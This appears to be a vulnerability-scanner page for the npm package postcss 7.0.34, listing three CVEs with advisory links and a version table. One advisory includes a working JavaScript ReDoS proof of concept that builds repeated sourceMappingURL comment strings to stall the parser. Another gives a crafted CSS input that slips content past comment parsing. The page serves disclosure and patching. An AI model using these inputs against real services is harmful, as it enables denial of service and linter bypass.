NodeJS/postcss/7.0.34
Tool for transforming styles with JS plugins
https://www.npmjs.com/package/postcss
MIT
3 Security Vulnerabilities
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23382
- https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
- https://github.com/advisories/GHSA-566m-qj78-rww5
- https://github.com/postcss/postcss/releases/tag/7.0.36
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern:

```regex
\/\*\s* sourceMappingURL=(.*)
```

PoC
```javascript
var postcss = require("postcss")

// Builds a string of n repeated, unterminated sourceMappingURL comment openers
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
PostCSS line return parsing error
- https://nvd.nist.gov/vuln/detail/CVE-2023-44270
- https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5
- https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25
- https://github.com/postcss/postcss/releases/tag/8.4.31
- https://github.com/advisories/GHSA-7fh5-64p2-3v2j
- https://github.com/github/advisory-database/issues/2820
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Regular Expression Denial of Service in postcss
- https://nvd.nist.gov/vuln/detail/CVE-2021-23368
- https://github.com/advisories/GHSA-hwj9-h5mp-3pm3
- https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4
- https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5
- https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E
- https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795
- https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595
- https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734
The npm package postcss, from version 7.0.0 and before versions 7.0.36 and 8.2.10, is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
261 Other Versions
Version | License | Security | Released | Age
---|---|---|---|---
8.4.47 | MIT | | 2024-09-14 - 14:37 | 6 days
8.4.46 | MIT | | 2024-09-14 - 14:28 | 6 days
8.4.45 | MIT | | 2024-09-04 - 09:35 | 17 days
8.4.44 | MIT | | 2024-09-02 - 08:23 | 19 days
8.4.43 | MIT | | 2024-09-01 - 19:07 | 19 days
8.4.42 | MIT | | 2024-08-31 - 21:29 | 20 days
8.4.41 | MIT | | 2024-08-05 - 23:08 | about 2 months
8.4.40 | MIT | | 2024-07-24 - 19:37 | about 2 months
8.4.39 | MIT | | 2024-06-29 - 18:22 | 3 months
8.4.38 | MIT | | 2024-03-20 - 22:55 | 6 months
8.4.37 | MIT | | 2024-03-19 - 16:57 | 6 months
8.4.36 | MIT | | 2024-03-17 - 20:09 | 6 months
8.4.35 | MIT | | 2024-02-07 - 15:37 | 8 months
8.4.34 | MIT | | 2024-02-05 - 19:22 | 8 months
8.4.33 | MIT | | 2024-01-04 - 19:04 | 9 months
8.4.32 | MIT | | 2023-12-02 - 02:56 | 10 months
8.4.31 | MIT | | 2023-09-28 - 22:15 | 12 months
8.4.30 | MIT | 1 | 2023-09-18 - 21:24 | about 1 year |
8.4.29 | MIT | 1 | 2023-08-29 - 17:47 | about 1 year |
8.4.28 | MIT | 1 | 2023-08-15 - 19:12 | about 1 year |
8.4.27 | MIT | 1 | 2023-07-21 - 11:51 | about 1 year |
8.4.26 | MIT | 1 | 2023-07-13 - 19:24 | about 1 year |
8.4.25 | MIT | 1 | 2023-07-06 - 11:44 | about 1 year |
8.4.24 | MIT | 1 | 2023-05-28 - 09:32 | over 1 year |
8.4.23 | MIT | 1 | 2023-04-19 - 19:03 | over 1 year |
8.4.22 | MIT | 1 | 2023-04-16 - 13:02 | over 1 year |
8.4.21 | MIT | 1 | 2023-01-06 - 20:29 | over 1 year |
8.4.20 | MIT | 1 | 2022-12-11 - 17:35 | almost 2 years |
8.4.19 | MIT | 1 | 2022-11-10 - 22:57 | almost 2 years |
8.4.18 | MIT | 1 | 2022-10-12 - 19:28 | almost 2 years |
8.4.17 | MIT | 1 | 2022-09-30 - 11:29 | almost 2 years |
8.4.16 | MIT | 1 | 2022-08-06 - 18:59 | about 2 years |
8.4.15 | MIT | 1 | 2022-08-06 - 18:25 | about 2 years |
8.4.14 | MIT | 1 | 2022-05-18 - 16:14 | over 2 years |
8.4.13 | MIT | 1 | 2022-04-30 - 00:50 | over 2 years |
8.4.12 | MIT | 1 | 2022-03-16 - 08:38 | over 2 years |
8.4.11 | MIT | 1 | 2022-03-15 - 18:28 | over 2 years |
8.4.10 | MIT | 1 | 2022-03-15 - 18:18 | over 2 years |
8.4.9 | MIT | 1 | 2022-03-15 - 18:08 | over 2 years |
8.4.8 | MIT | 1 | 2022-03-07 - 02:10 | over 2 years |
8.4.7 | MIT | 1 | 2022-02-24 - 22:07 | over 2 years |
8.4.6 | MIT | 1 | 2022-02-01 - 11:37 | over 2 years |
8.4.5 | MIT | 1 | 2021-12-13 - 00:03 | almost 3 years |
8.4.4 | MIT | 1 | 2021-11-27 - 14:58 | almost 3 years |
8.4.3 | MIT | 1 | 2021-11-26 - 19:20 | almost 3 years |
8.4.2 | MIT | 1 | 2021-11-26 - 18:45 | almost 3 years |
8.4.1 | MIT | 1 | 2021-11-24 - 22:06 | almost 3 years |
8.4.0 | MIT | 1 | 2021-11-24 - 13:06 | almost 3 years |
8.3.11 | MIT | 1 | 2021-10-21 - 12:43 | almost 3 years |
8.3.10 | MIT | 1 | 2021-10-20 - 17:47 | almost 3 years |
8.3.9 | MIT | 1 | 2021-10-04 - 20:14 | almost 3 years |
8.3.8 | MIT | 1 | 2021-09-25 - 07:33 | almost 3 years |
8.3.7 | MIT | 1 | 2021-09-22 - 05:54 | almost 3 years |
8.3.6 | MIT | 1 | 2021-07-21 - 15:53 | about 3 years |
8.3.5 | MIT | 1 | 2021-06-17 - 03:25 | over 3 years |
8.3.4 | MIT | 1 | 2021-06-14 - 13:27 | over 3 years |
8.3.3 | MIT | 1 | 2021-06-14 - 05:34 | over 3 years |
8.3.2 | MIT | 1 | 2021-06-11 - 02:57 | over 3 years |
8.3.1 | MIT | 1 | 2021-06-09 - 23:38 | over 3 years |
8.3.0 | MIT | 1 | 2021-05-21 - 03:41 | over 3 years |
8.2.15 | MIT | 1 | 2021-05-10 - 19:56 | over 3 years |
8.2.14 | MIT | 1 | 2021-05-05 - 19:44 | over 3 years |
8.2.13 | MIT | 1 | 2021-04-26 - 12:26 | over 3 years |
8.2.12 | MIT | 2 | 2021-04-22 - 15:50 | over 3 years |
8.2.11 | MIT | 2 | 2021-04-22 - 15:32 | over 3 years |
8.2.10 | MIT | 2 | 2021-04-11 - 16:37 | over 3 years |
8.2.9 | MIT | 3 | 2021-03-30 - 20:43 | over 3 years |
8.2.8 | MIT | 3 | 2021-03-09 - 22:04 | over 3 years |
8.2.7 | MIT | 3 | 2021-03-03 - 23:25 | over 3 years |
8.2.6 | MIT | 3 | 2021-02-10 - 18:38 | over 3 years |
8.2.5 | MIT | 3 | 2021-02-06 - 18:57 | over 3 years |
8.2.4 | MIT | 3 | 2021-01-09 - 10:28 | over 3 years |
8.2.3 | MIT | 3 | 2021-01-07 - 12:06 | over 3 years |
8.2.2 | MIT | 3 | 2020-12-29 - 20:56 | over 3 years |
8.2.1 | MIT | 3 | 2020-12-09 - 11:52 | almost 4 years |
8.2.0 | MIT | 3 | 2020-12-08 - 07:16 | almost 4 years |
8.1.14 | MIT | 3 | 2020-12-04 - 00:21 | almost 4 years |
8.1.13 | MIT | 3 | 2020-12-03 - 03:14 | almost 4 years |
8.1.12 | MIT | 3 | 2020-12-03 - 02:41 | almost 4 years |
8.1.11 | MIT | 3 | 2020-12-03 - 01:44 | almost 4 years |
8.1.10 | MIT | 3 | 2020-11-23 - 22:17 | almost 4 years |
8.1.9 | MIT | 3 | 2020-11-21 - 18:37 | almost 4 years |
8.1.8 | MIT | 3 | 2020-11-19 - 15:58 | almost 4 years |
8.1.7 | MIT | 3 | 2020-11-10 - 15:58 | almost 4 years |
8.1.6 | MIT | 3 | 2020-11-05 - 16:28 | almost 4 years |
8.1.5 | MIT | 3 | 2020-11-05 - 15:50 | almost 4 years |
8.1.4 | MIT | 3 | 2020-10-24 - 00:03 | almost 4 years |
8.1.3 | MIT | 3 | 2020-10-23 - 02:20 | almost 4 years |
8.1.2 | MIT | 3 | 2020-10-19 - 00:02 | almost 4 years |
8.1.1 | MIT | 3 | 2020-09-28 - 21:47 | almost 4 years |
8.1.0 | MIT | 3 | 2020-09-26 - 23:35 | almost 4 years |
8.0.9 | MIT | 3 | 2020-09-23 - 17:04 | almost 4 years |
8.0.8 | MIT | 3 | 2020-09-23 - 02:11 | almost 4 years |
8.0.7 | MIT | 3 | 2020-09-22 - 00:55 | almost 4 years |
8.0.6 | MIT | 3 | 2020-09-20 - 16:53 | about 4 years |
8.0.5 | MIT | 3 | 2020-09-17 - 02:42 | about 4 years |
8.0.4 | MIT | 3 | 2020-09-16 - 22:20 | about 4 years |
8.0.3 | MIT | 3 | 2020-09-15 - 19:13 | about 4 years |
8.0.2 | MIT | 3 | 2020-09-15 - 16:46 | about 4 years |
8.0.1 | MIT | 3 | 2020-09-15 - 15:34 | about 4 years |